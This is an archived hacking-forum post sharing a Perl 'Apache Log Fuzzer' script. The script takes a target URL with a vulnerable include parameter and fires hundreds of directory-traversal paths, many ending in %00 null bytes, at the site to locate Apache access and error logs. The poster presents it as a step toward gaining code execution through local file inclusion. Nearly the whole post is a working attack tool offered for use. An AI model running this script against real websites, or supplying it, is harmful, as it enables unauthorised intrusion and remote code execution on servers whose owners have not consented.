PDA

View Full Version : LFI Log Fuzzer



Void
03-07-2015, 12:23 PM
sometimes u find LFI bug (which is rare nowadays ...)
and u need to find the apache log files for code execution this tool comes in handy :untroubled:




#!/usr/bin/perl

use HTTP::Request;
use LWP::UserAgent;
system ("cls");
print "\t\t/////////////////////////////////////////////////\n";
print "\t\t______________________________________________ ___\n";
print "\t\t\t Yakamoz Apache Log Fuzzer Ver.1.0\n";
print "\t\t\t Coded By Bl4ck.Viper\n";
print "\t\t\t Thanks From 2MzRp\n";
print "\t\t______________________________________________ ___\n";
print "\n\n";
sleep (1);
print "\t\t\t\t WELCOME\n";
print "\n";
print "\n\n";
print "\t Insert Target (ex: http://www.site.com/index.php?page=)\n";
print "\t Target :";
$host=<STDIN>;
chomp($host);
if($host !~ /http:\/\//) { $host = "http://$host"; };

print "\n\n";
print "\t\t*-*-*-*-*-* WORKING IN PROGRESS *-*-*-*-*-*\n";
print "\n\n";
@Logs= ('../apache/logs/access.log ',
'../../apache/logs/access.log ',
'../../../apache/logs/access.log ',
'../../../../apache/logs/access.log ',
'../../../../../apache/logs/access.log ',
'../../../../../../apache/logs/access.log ',
'../../../../../../../apache/logs/access.log ',
'../../../../../../../../apache/logs/access.log ',
'../../../../../../../../../apache/logs/access.log ',
'../../../../../../../../../../apache/logs/access.log ',
'../../../../../../../../../../../apache/logs/access.log ',
'../../../../../../../../../../../../apache/logs/access.log ',
'../../../../../../../../../../../../../apache/logs/access.log ',
'../../../../../../../../../../../../../../apache/logs/access.log ',
'../../../../../../../../../../../../../../../../apache/logs/access.log ',
'../apache/logs/access.log%00',
'../../apache/logs/access.log%00',
'../../../apache/logs/access.log%00',
'../../../../apache/logs/access.log%00',
'../../../../../apache/logs/access.log%00',
'../../../../../../apache/logs/access.log%00',
'../../../../../../../apache/logs/access.log%00',
'../../../../../../../../apache/logs/access.log%00',
'../../../../../../../../../apache/logs/access.log%00',
'../../../../../../../../../../apache/logs/access.log%00',
'../../../../../../../../../../../apache/logs/access.log%00',
'../../../../../../../../../../../../apache/logs/access.log%00',
'../../../../../../../../../../../../../apache/logs/access.log%00',
'../../../../../../../../../../../../../../apache/logs/access.log%00',
'../../../../../../../../../../../../../../../../apache/logs/access.log%00',
'../../apache/logs/error.log ',
'../../../apache/logs/error.log ',
'../../../../apache/logs/error.log ',
'../../../../../apache/logs/error.log ',
'../../../../../../apache/logs/error.log ',
'../../../../../../../apache/logs/error.log ',
'../../../../../../../../apache/logs/error.log ',
'../../../../../../../../../apache/logs/error.log ',
'../../../../../../../../../../apache/logs/error.log ',
'../../../../../../../../../../../apache/logs/error.log ',
'../../../../../../../../../../../../apache/logs/error.log ',
'../../../../../../../../../../../../../apache/logs/error.log ',
'../../../../../../../../../../../../../../apache/logs/error.log ',
'../../../../../../../../../../../../../../../../apache/logs/error.log ',
'../../apache/logs/error.log%00',
'../../../apache/logs/error.log%00',
'../../../../apache/logs/error.log%00',
'../../../../../apache/logs/error.log%00',
'../../../../../../apache/logs/error.log%00',
'../../../../../../../apache/logs/error.log%00',
'../../../../../../../../apache/logs/error.log%00',
'../../../../../../../../../apache/logs/error.log%00',
'../../../../../../../../../../apache/logs/error.log%00',
'../../../../../../../../../../../apache/logs/error.log%00',
'../../../../../../../../../../../../apache/logs/error.log%00',
'../../../../../../../../../../../../../apache/logs/error.log%00',
'../../../../../../../../../../../../../../apache/logs/error.log%00',
'../../../../../../../../../../../../../../../../apache/logs/error.log%00',
'../etc/httpd/logs/acces_log ',
'../../etc/httpd/logs/acces_log ',
'../../../etc/httpd/logs/acces_log ',
'../../../../etc/httpd/logs/acces_log ',
'../../../../../etc/httpd/logs/acces_log ',
'../../../../../../etc/httpd/logs/acces_log ',
'../../../../../../../etc/httpd/logs/acces_log ',
'../../../../../../../../etc/httpd/logs/acces_log ',
'../../../../../../../../../etc/httpd/logs/acces_log ',
'../../../../../../../../../../etc/httpd/logs/acces_log ',
'../../../../../../../../../../../etc/httpd/logs/acces_log ',
'../../../../../../../../../../../../etc/httpd/logs/acces_log ',
'../../../../../../../../../../../../../etc/httpd/logs/acces_log ',
'../../../../../../../../../../../../../../etc/httpd/logs/acces_log ',
'../etc/httpd/logs/acces_log%00',
'../../etc/httpd/logs/acces_log%00',
'../../../etc/httpd/logs/acces_log%00',
'../../../../etc/httpd/logs/acces_log%00',
'../../../../../etc/httpd/logs/acces_log%00',
'../../../../../../etc/httpd/logs/acces_log%00',
'../../../../../../../etc/httpd/logs/acces_log%00',
'../../../../../../../../etc/httpd/logs/acces_log%00',
'../../../../../../../../../etc/httpd/logs/acces_log%00',
'../../../../../../../../../../etc/httpd/logs/acces_log%00',
'../../../../../../../../../../../etc/httpd/logs/acces_log%00',
'../../../../../../../../../../../../etc/httpd/logs/acces_log%00',
'../../../../../../../../../../../../../etc/httpd/logs/acces_log%00',
'../../../../../../../../../../../../../../etc/httpd/logs/acces_log%00',
'../etc/httpd/logs/error_log ',
'../../etc/httpd/logs/error_log ',
'../../../etc/httpd/logs/error_log ',
'../../../../etc/httpd/logs/error_log ',
'../../../../../etc/httpd/logs/error_log ',
'../../../../../../etc/httpd/logs/error_log ',
'../../../../../../../etc/httpd/logs/error_log ',
'../../../../../../../../etc/httpd/logs/error_log ',
'../../../../../../../../../etc/httpd/logs/error_log ',
'../../../../../../../../../../etc/httpd/logs/error_log ',
'../../../../../../../../../../../etc/httpd/logs/error_log ',
'../../../../../../../../../../../../etc/httpd/logs/error_log ',
'../../../../../../../../../../../../../etc/httpd/logs/error_log ',
'../../../../../../../../../../../../../../etc/httpd/logs/error_log ',
'../etc/httpd/logs/error_log%00',
'../../etc/httpd/logs/error_log%00',
'../../../etc/httpd/logs/error_log%00',
'../../../../etc/httpd/logs/error_log%00',
'../../../../../etc/httpd/logs/error_log%00',
'../../../../../../etc/httpd/logs/error_log%00',
'../../../../../../../etc/httpd/logs/error_log%00',
'../../../../../../../../etc/httpd/logs/error_log%00',
'../../../../../../../../../etc/httpd/logs/error_log%00',
'../../../../../../../../../../etc/httpd/logs/error_log%00',
'../../../../../../../../../../../etc/httpd/logs/error_log%00',
'../../../../../../../../../../../../etc/httpd/logs/error_log%00',
'../../../../../../../../../../../../../etc/httpd/logs/error_log%00',
'../../../../../../../../../../../../../../etc/httpd/logs/error_log%00',
'../usr/local/apache/logs/access_log ',
'../../usr/local/apache/logs/access_log ',
'../../../usr/local/apache/logs/access_log ',
'../../../../usr/local/apache/logs/access_log ',
'../../../../../usr/local/apache/logs/access_log ',
'../../../../../../usr/local/apache/logs/access_log ',
'../../../../../../../usr/local/apache/logs/access_log ',
'../../../../../../../../usr/local/apache/logs/access_log ',
'../../../../../../../../../usr/local/apache/logs/access_log ',
'../../../../../../../../../../usr/local/apache/logs/access_log ',
'../../../../../../../../../../../usr/local/apache/logs/access_log ',
'../../../../../../../../../../../../usr/local/apache/logs/access_log ',
'../../../../../../../../../../../../../usr/local/apache/logs/access_log ',
'../../../../../../../../../../../../../../usr/local/apache/logs/access_log ',
'../usr/local/apache/logs/access_log%00',
'../../usr/local/apache/logs/access_log%00',
'../../../usr/local/apache/logs/access_log%00',
'../../../../usr/local/apache/logs/access_log%00',
'../../../../../usr/local/apache/logs/access_log%00',
'../../../../../../usr/local/apache/logs/access_log%00',
'../../../../../../../usr/local/apache/logs/access_log%00',
'../../../../../../../../usr/local/apache/logs/access_log%00',
'../../../../../../../../../usr/local/apache/logs/access_log%00',
'../../../../../../../../../../usr/local/apache/logs/access_log%00',
'../../../../../../../../../../../usr/local/apache/logs/access_log%00',
'../../../../../../../../../../../../usr/local/apache/logs/access_log%00',
'../../../../../../../../../../../../../usr/local/apache/logs/access_log%00',
'../../../../../../../../../../../../../../usr/local/apache/logs/access_log%00',
'../usr/local/apache/logs/access.log ',
'../../usr/local/apache/logs/access.log ',
'../../../usr/local/apache/logs/access.log ',
'../../../../usr/local/apache/logs/access.log ',
'../../../../../usr/local/apache/logs/access.log ',
'../../../../../../usr/local/apache/logs/access.log ',
'../../../../../../../usr/local/apache/logs/access.log ',
'../../../../../../../../usr/local/apache/logs/access.log ',
'../../../../../../../../../usr/local/apache/logs/access.log ',
'../../../../../../../../../../usr/local/apache/logs/access.log ',
'../../../../../../../../../../../usr/local/apache/logs/access.log ',
'../../../../../../../../../../../../usr/local/apache/logs/access.log ',
'../../../../../../../../../../../../../usr/local/apache/logs/access.log ',
'../../../../../../../../../../../../../../usr/local/apache/logs/access.log ',
'../usr/local/apache/logs/access.log%00',
'../../usr/local/apache/logs/access.log%00',
'../../../usr/local/apache/logs/access.log%00',
'../../../../usr/local/apache/logs/access.log%00',
'../../../../../usr/local/apache/logs/access.log%00',
'../../../../../../usr/local/apache/logs/access.log%00',
'../../../../../../../usr/local/apache/logs/access.log%00',
'../../../../../../../../usr/local/apache/logs/access.log%00',
'../../../../../../../../../usr/local/apache/logs/access.log%00',
'../../../../../../../../../../usr/local/apache/logs/access.log%00',
'../../../../../../../../../../../usr/local/apache/logs/access.log%00',
'../../../../../../../../../../../../usr/local/apache/logs/access.log%00',
'../../../../../../../../../../../../../usr/local/apache/logs/access.log%00',
'../../../../../../../../../../../../../../usr/local/apache/logs/access.log%00',
'../etc/httpd/logs/access_log ',
'../../etc/httpd/logs/access_log ',
'../../../etc/httpd/logs/access_log ',
'../../../../etc/httpd/logs/access_log ',
'../../../../../etc/httpd/logs/access_log ',
'../../../../../../etc/httpd/logs/access_log ',
'../../../../../../../etc/httpd/logs/access_log ',
'../../../../../../../../etc/httpd/logs/access_log ',
'../../../../../../../../../etc/httpd/logs/access_log ',
'../../../../../../../../../../etc/httpd/logs/access_log ',
'../../../../../../../../../../../etc/httpd/logs/access_log ',
'../etc/httpd/logs/access_log%00',
'../../etc/httpd/logs/access_log%00',
'../../../etc/httpd/logs/access_log%00',
'../../../../etc/httpd/logs/access_log%00',
'../../../../../etc/httpd/logs/access_log%00',
'../../../../../../etc/httpd/logs/access_log%00',
'../../../../../../../etc/httpd/logs/access_log%00',
'../../../../../../../../etc/httpd/logs/access_log%00',
'../../../../../../../../../etc/httpd/logs/access_log%00',
'../../../../../../../../../../etc/httpd/logs/access_log%00',
'../../../../../../../../../../../etc/httpd/logs/access_log%00',
'../etc/httpd/logs/error_log ',
'../../etc/httpd/logs/error_log ',
'../../../etc/httpd/logs/error_log ',
'../../../../etc/httpd/logs/error_log ',
'../../../../../etc/httpd/logs/error_log ',
'../../../../../../etc/httpd/logs/error_log ',
'../../../../../../../etc/httpd/logs/error_log ',
'../../../../../../../../etc/httpd/logs/error_log ',
'../../../../../../../../../etc/httpd/logs/error_log ',
'../../../../../../../../../../etc/httpd/logs/error_log ',
'../../../../../../../../../../../etc/httpd/logs/error_log ',
'../etc/httpd/logs/error_log%00',
'../../etc/httpd/logs/error_log%00',
'../../../etc/httpd/logs/error_log%00',
'../../../../etc/httpd/logs/error_log%00',
'../../../../../etc/httpd/logs/error_log%00',
'../../../../../../etc/httpd/logs/error_log%00',
'../../../../../../../etc/httpd/logs/error_log%00',
'../../../../../../../../etc/httpd/logs/error_log%00',
'../../../../../../../../../etc/httpd/logs/error_log%00',
'../../../../../../../../../../etc/httpd/logs/error_log%00',
'../../../../../../../../../../../etc/httpd/logs/error_log%00',
'../var/log/apache/access_log ',
'../../var/log/apache/access_log ',
'../../../var/log/apache/access_log ',
'../../../../var/log/apache/access_log ',
'../../../../../var/log/apache/access_log ',
'../../../../../../var/log/apache/access_log ',
'../../../../../../../var/log/apache/access_log ',
'../../../../../../../../var/log/apache/access_log ',
'../../../../../../../../../var/log/apache/access_log ',
'../../../../../../../../../../var/log/apache/access_log ',
'../../../../../../../../../../../var/log/apache/access_log ',
'../../../../../../../../../../../../var/log/apache/access_log ',
'../../../../../../../../../../../../../var/log/apache/access_log ',
'../../../../../../../../../../../../../../var/log/apache/access_log ',
'../var/log/apache/access_log%00',
'../../var/log/apache/access_log%00',
'../../../var/log/apache/access_log%00',
'../../../../var/log/apache/access_log%00',
'../../../../../var/log/apache/access_log%00',
'../../../../../../var/log/apache/access_log%00',
'../../../../../../../var/log/apache/access_log%00',
'../../../../../../../../var/log/apache/access_log%00',
'../../../../../../../../../var/log/apache/access_log%00',
'../../../../../../../../../../var/log/apache/access_log%00',
'../../../../../../../../../../../var/log/apache/access_log%00',
'../../../../../../../../../../../../var/log/apache/access_log%00',
'../../../../../../../../../../../../../var/log/apache/access_log%00',
'../../../../../../../../../../../../../../var/log/apache/access_log%00');

foreach $scan(@Logs){

$url = $host.$scan;
$request = HTTP::Request->new(GET=>$url);
$useragent = LWP::UserAgent->new();

$response = $useragent->request($request);
if ($response->is_success && $response->content =~ /Apache/) { $msg = Vulnerability;}
else { $msg = "Not Found";}
print "$scan..........[$msg]\n";
}